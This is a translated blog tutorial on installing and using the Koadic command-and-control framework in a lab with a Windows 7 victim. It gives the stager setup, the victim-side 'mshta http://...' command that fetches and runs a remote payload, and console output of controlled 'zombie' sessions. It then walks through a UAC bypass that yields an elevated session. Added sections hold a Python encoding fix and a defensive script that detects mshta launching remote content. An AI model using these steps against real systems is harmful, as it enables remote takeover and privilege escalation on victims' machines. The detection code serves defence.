
Installing and using Koadic: an HTTP C2 remote-control tool

Source: Internet | Collected by: 自由互联 | Published: 2021-06-16

Installing and using Koadic

2017-11-26 11:02 · Word count 690 · Reads 611 · Comments 0

Overview

Koadic is a post-exploitation tool that came out of DEFCON; it does most of its work through VBScript and JScript.
Without further ado, let's start the demo.

Environment

I set up two virtual machines: a Kali box as the attacker,
and a Windows 7 64-bit box as the victim.

Installation

Installation is straightforward:
git clone https://github.com/zerosum0x0/koadic.git
Then install the dependencies:
cd koadic/
pip install -r requirements.txt

Usage

Start it with
./koadic

.
                           /      _                   _ | |
    | | _____   __ _  __| || |  ___
    | |/ / _ \ / _` |/ _` ||.| / __|
    |   / (o) | (_| | (_| ||.|| (__
    |_|\_\_^_/ \__,_|\__,_||:| \___|
                           |:|
                        ~\==8==/~
                            8
                            O

        -{ COM Command & Control }-
      Windows Post-Exploitation Tools
             Endless Intellect

            ~[ Version:  0x8 ]~
            ~[ Stagers:    4 ]~
            ~[ Implants:  29 ]~

(koadic: sta/js/mshta)# 

First, a few concepts this tool uses:

  • Stagers are the kinds of payload delivered to the target machine
  • Implants are the actions you can carry out once you control a machine

For the specific stagers and implants, see the project's GitHub page:
https://github.com/zerosum0x0/koadic

Next we run
use stager/js/mshta
which selects the mshta stager.
Then set the local IP and port and start listening locally.
You can type the info command to see which parameters need to be set.
set LHOST 192.168.1.104
set LPORT 9999
Then start it:
run

(koadic: sta/js/mshta)# run
[+] Spawned a stager at http://192.168.1.104:9999/BYhBU
[>] mshta http://192.168.1.104:9999/BYhBU

Since this is a post-exploitation tool, by definition you are already able to run at least one command on the machine you control.
On the victim machine, run
mshta http://192.168.1.104:9999/BYhBU
In my case I just opened a cmd window and ran it there.
Next comes a Python character-encoding pitfall; the following error appears:

(koadic: sta/js/mshta)#
----------------------------------------
Exception happened during processing of request from ('192.168.1.110', 49159)
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 596, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__
    self.handle()
  File "/root/koadic/core/handler.py", line 90, in handle
    return BaseHTTPRequestHandler.handle(self)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle
    self.handle_one_request()
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request
    method()
  File "/root/koadic/core/handler.py", line 169, in do_POST
    self.session.parse_user_info(data)
  File "/root/koadic/core/session.py", line 56, in parse_user_info
    data = data.decode().split("~~~")
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe4 in position 65: ordinal not in range(128)
----------------------------------------
[!] Zombie 0: Timed out.

The relevant line is this one:
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe4 in position 65: ordinal not in range(128)
The victim reports its OS name as "Windows 7 专业版", and Python 2's default str.decode() uses ASCII, which cannot represent those bytes; switching the default character encoding to utf-8 is enough to fix it.
Here is how. First quit the program,
then open this file:
vim koadic

Add the following lines near the top (right after the shebang):

import sys
reload(sys)
sys.setdefaultencoding('utf-8')

The whole file then looks like this:

#!/usr/bin/env python
# Added for this fix: make Python 2 decode str as UTF-8 by default
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
# Copyright (c) 2016 - 2017 RiskSense, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use the software except in compliance with the License.
#
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.

# Disclaimer:
# Usage of Koadic for attacking targets without prior mutual consent is illegal.
# It is the end user's responsibility to obey all applicable local, state,
# federal, and international laws. Developers assume no liability and are not
# responsible for any misuse or damage caused by this program.

__version_info__ = (0, 8)
__version__ = "x".join(map(str, __version_info__))
__license__ = "Apache 2.0"
__credits__ = ["zerosum0x0", "jmage", "TheNaterz", "aleph-naught-"]

if __name__ == "__main__":
    import core.shell
    banner = open("data/banner.txt", "rb").read().decode("unicode_escape")
    shell = core.shell.Shell(banner, __version__)
    shell.run()
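Forcing a process-wide default with sys.setdefaultencoding is a Python 2 only hack; the cleaner fix is to decode the POST body with an explicit encoding at the one place it is read. The following is an added example written for this article, not Koadic's own code: it reproduces the ASCII-decode failure on a constructed POST body that carries the CJK OS name, and shows the explicit-UTF-8 version that maps the fields to names. The field order (user, hostname, DC, OS, architecture, elevated) is an assumption of the demo, not the implant's actual wire format.

```python
# -*- coding: utf-8 -*-
"""Added example for this article, not Koadic's own code.

Reproduces the failure in the traceback above (a Python 2 style ASCII decode of
a POST body containing CJK bytes) and the explicit decoding that avoids it.
The field order user~~~hostname~~~dc~~~os~~~arch~~~elevated is an assumption
made for the demo; the real implant reports whatever its JScript collects.
"""

FIELD_NAMES = ("user", "hostname", "primary_dc", "os", "arch", "elevated")

# Constructed sample POST body, modelled on the zombie details printed later in
# the article. "专" encodes to UTF-8 as e4 b8 93, so a pure-ASCII decode dies on
# the 0xe4 byte, exactly the "can't decode byte 0xe4" in the traceback.
SAMPLE_POST_BODY = (
    u"WIN-HK90RUM6L1B\\bboysoul~~~WIN-HK90RUM6L1B~~~Unknown~~~"
    u"Microsoft Windows 7 专业版~~~64-bit~~~No"
).encode("utf-8")


def parse_user_info_ascii(data):
    """The failing behaviour: Python 2's bare str.decode() means ASCII."""
    return data.decode("ascii").split("~~~")


def first_non_ascii_position(data):
    """Index of the first byte >= 0x80, or -1 (the 'position N' in the error)."""
    for i, b in enumerate(bytearray(data)):
        if b >= 0x80:
            return i
    return -1


def parse_user_info(data, encoding="utf-8"):
    """Decode with an explicit encoding and map the fields to names.

    errors="replace" keeps the handler thread alive even if a client sends a
    legacy codepage (e.g. GBK) instead of UTF-8: a garbled OS string in the
    zombie listing is better than a crashed handler and a timed-out session.
    """
    text = data.decode(encoding, errors="replace")
    parts = text.split("~~~")
    if len(parts) != len(FIELD_NAMES):
        raise ValueError("expected %d fields, got %d" % (len(FIELD_NAMES), len(parts)))
    return dict(zip(FIELD_NAMES, parts))


if __name__ == "__main__":
    try:
        parse_user_info_ascii(SAMPLE_POST_BODY)
    except UnicodeDecodeError as exc:
        print("ascii decode failed at byte %d: %s" % (exc.start, exc.reason))
    for name, value in sorted(parse_user_info(SAMPLE_POST_BODY).items()):
        print("%-12s %s" % (name, value))
```

With the constructed body the ASCII decode fails at byte 75, the first byte of "专"; the explicit UTF-8 decode returns all six fields intact, and the sanity check on the field count turns a malformed body into a ValueError in that one request instead of an unhandled exception in the server thread.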

After that, repeat the steps above and the error no longer appears:

(koadic: sta/js/mshta)# use stager/js/mshta
(koadic: sta/js/mshta)# set LHOST 192.168.1.104
[+] LHOST => 192.168.1.104
(koadic: sta/js/mshta)# run
[+] Spawned a stager at http://192.168.1.104:9999/N435X
[>] mshta http://192.168.1.104:9999/N435X
[+] Zombie 0: Staging new connection (192.168.1.110)
[+] Zombie 0: WIN-HK90RUM6L1B\bboysoul @ WIN-HK90RUM6L1B -- Microsoft Windows 7 专业版
(koadic: sta/js/mshta)# 
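
From the defender's side, the delivery step above is the observable part: mshta.exe being launched with an HTTP URL as its argument, and then a command interpreter running underneath it. The following is an added example, not part of the article or of Koadic, that runs exactly that check over a few constructed process-creation records; the record fields (pid, ppid, image, cmdline) are an assumption of the demo, loosely modelled on Sysmon Event ID 1, not a real log format.

```python
"""Added example for this article, not Koadic's own code: a small detection
pass over process-creation telemetry for the stager delivery shown above,
`mshta http://host:port/path`.

The records below are constructed for the demo; their field names (pid, ppid,
image, cmdline) loosely follow Sysmon Event ID 1 and are an assumption, not a
real log format.
"""
import re

# Constructed sample events. 1300 mirrors the stager launch from the
# walkthrough (started from a cmd window); 1400 is a constructed child shell
# under mshta; 1500 is a benign, local .hta included for contrast.
SAMPLE_EVENTS = [
    {"pid": 1200, "ppid": 900, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe"'},
    {"pid": 1300, "ppid": 1200, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://192.168.1.104:9999/N435X"},
    {"pid": 1400, "ppid": 1300, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"pid": 1500, "ppid": 900, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
]

REMOTE_URL = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
# Command interpreters that an HTA-hosted script would use to run commands.
CHILD_INTERPRETERS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def mshta_with_remote_url(event):
    """True when mshta.exe is launched with a remote URL as an argument."""
    if basename(event["image"]) != "mshta.exe":
        return False
    args = [a.strip('"') for a in event["cmdline"].split()[1:]]
    return any(REMOTE_URL.match(a) for a in args)


def analyze(events):
    """Return (pid, reason) findings for the two behaviours described above."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if mshta_with_remote_url(e):
            findings.append((e["pid"], "mshta.exe pulling remote content: " + e["cmdline"]))
        parent = by_pid.get(e["ppid"])
        if (parent is not None and basename(parent["image"]) == "mshta.exe"
                and basename(e["image"]) in CHILD_INTERPRETERS):
            findings.append((e["pid"], "%s spawned by mshta.exe (pid %d)"
                             % (basename(e["image"]), parent["pid"])))
    return findings


if __name__ == "__main__":
    for pid, reason in analyze(SAMPLE_EVENTS):
        print("pid %d: %s" % (pid, reason))
```

On the constructed records the pass flags pid 1300 (mshta.exe with an http:// argument) and pid 1400 (cmd.exe whose parent is mshta.exe), while the local .hta launch in pid 1500 is left alone; the URL check is on the argument list rather than a substring match so that a file path containing "http" does not trip it.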

Next we escalate privileges, i.e. bypass UAC.

Type zombies to list the machines we control:

(koadic: sta/js/mshta)# zombies

ID   IP              STATUS   LAST SEEN
---  -------------   -------  -------------------
0    192.168.1.110   Alive    2017-11-25 21:27:46

Use "zombies ID" for detailed information about a session.

Type zombies 0 to see the details of that machine:

(koadic: sta/js/mshta)# zombies 0

ID:           0
Status:       Alive
Last Seen:    2017-11-25 21:28:42
IP:           192.168.1.110
User:         WIN-HK90RUM6L1B\bboysoul
Hostname:     WIN-HK90RUM6L1B
Primary DC:   Unknown
OS:           Microsoft Windows 7 专业版
OSArch:       64-bit
Elevated:     No
User Agent:   Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Session Key:  f4d7735b8a9d45a5a74ed5a63a164421

JOB   NAME        STATUS    ERRNO
----  ---------   -------   -------

Elevated shows No, meaning we have not escalated yet.
Type
use implant/elevate/bypassuac_eventvwr
and look at the module's info:

(koadic: imp/ele/bypassuac_eventvwr)# info

NAME      VALUE          REQ   DESCRIPTION
-----     ------------   ----  -------------
PAYLOAD                  yes   run payloads for a list
ZOMBIE    ALL            yes   the zombie to target

Here we set both PAYLOAD and ZOMBIE to 0, i.e. payload number 0 and zombie ID 0.
Then just run:

(koadic: imp/ele/bypassuac_eventvwr)# run
[*] Zombie 0: Job 16 (implant/elevate/bypassuac_eventvwr) created.
[+] Zombie 0: Job 16 (implant/elevate/bypassuac_eventvwr) completed.
[+] Zombie 1: Staging new connection (192.168.1.110)
[+] Zombie 1: WIN-HK90RUM6L1B\bboysoul* @ WIN-HK90RUM6L1B -- Microsoft Windows 7 专业版

Success.
Note, however, that the program opened a new connection to do the bypass: the original zombie still exists but is still the non-elevated user, and the newly created connection is the elevated one. If you doubt it, type zombies and see whether an extra connection has appeared:

(koadic: imp/ele/bypassuac_eventvwr)# zombies

ID   IP              STATUS   LAST SEEN
---  -------------   -------  -------------------
0    192.168.1.110   Alive    2017-11-25 21:43:00
1*   192.168.1.110   Alive    2017-11-25 21:43:00

Use "zombies ID" for detailed information about a session.

Look at zombie 1's details:

(koadic: imp/ele/bypassuac_eventvwr)# zombies 1

ID:           1
Status:       Alive
Last Seen:    2017-11-25 21:45:35
IP:           192.168.1.110
User:         WIN-HK90RUM6L1B\bboysoul*
Hostname:     WIN-HK90RUM6L1B
Primary DC:   Unknown
OS:           Microsoft Windows 7 专业版
OSArch:       64-bit
Elevated:     YES!
User Agent:   Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Session Key:  c42dec18786a47f2bc4ee023dc8f69bd

JOB   NAME        STATUS    ERRNO
----  ---------   -------   -------

Elevation succeeded. On an elevated session we can use every module under implant; explore the individual modules yourself.
